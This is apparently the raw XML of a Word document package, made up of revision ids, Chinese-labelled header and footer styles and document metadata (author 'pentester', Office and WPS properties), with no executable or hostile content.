    <w:rsid w:val="00D57146"/>
    <w:rsid w:val="00D63BAF"/>
    <w:rsid w:val="00D8549C"/>
    <w:rsid w:val="00D85BE2"/>
    <w:rsid w:val="00D93BCD"/>
    <w:rsid w:val="00DC188F"/>
    <w:rsid w:val="00DE3C45"/>
    <w:rsid w:val="00E06F03"/>
    <w:rsid w:val="00E32B41"/>
    <w:rsid w:val="00E4064B"/>
    <w:rsid w:val="00E4467F"/>
    <w:rsid w:val="00E60671"/>
    <w:rsid w:val="00E60E26"/>
    <w:rsid w:val="00E64D9A"/>
    <w:rsid w:val="00E8168C"/>
    <w:rsid w:val="00E8250D"/>
    <w:rsid w:val="00E97B9F"/>
    <w:rsid w:val="00EA5BBE"/>
    <w:rsid w:val="00EA6212"/>
    <w:rsid w:val="00EB1167"/>
    <w:rsid w:val="00EC306D"/>
    <w:rsid w:val="00ED19EF"/>
    <w:rsid w:val="00ED4E73"/>
    <w:rsid w:val="00EE36C3"/>
    <w:rsid w:val="00EE3AEE"/>
    <w:rsid w:val="00EF0182"/>
    <w:rsid w:val="00F012ED"/>
    <w:rsid w:val="00F05C40"/>
    <w:rsid w:val="00F06CC5"/>
    <w:rsid w:val="00F3189D"/>
    <w:rsid w:val="00F53286"/>
    <w:rsid w:val="00F539AE"/>
    <w:rsid w:val="00F55335"/>
    <w:rsid w:val="00F744DB"/>
    <w:rsid w:val="00F756C5"/>
    <w:rsid w:val="00F938B9"/>
    <w:rsid w:val="00F97563"/>
    <w:rsid w:val="00FA0C72"/>
    <w:rsid w:val="00FC6151"/>
    <w:rsid w:val="00FC78EA"/>
    <w:rsid w:val="00FE1E7F"/>
    <w:rsid w:val="00FE3F4D"/>
    <w:rsid w:val="00FF16BA"/>
    <w:rsid w:val="4FB37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06F27"/>
  <w15:docId w15:val="{38AF0AD4-C5DC-4B27-B5ED-888180535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footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a5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a7">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a5">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18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1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character" w:styleId="aa">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B460E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751D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127</Words>
  <Characters>730</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>6</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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pentester</cp:lastModifiedBy>
  <cp:revision>75</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-16T10:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-14T02:11:00Z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2052-12.1.0.17857</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>C3E453BFF82743E2AB55616DFA624C6F_12</vt:lpwstr>
  </property>
</Properties>
</file>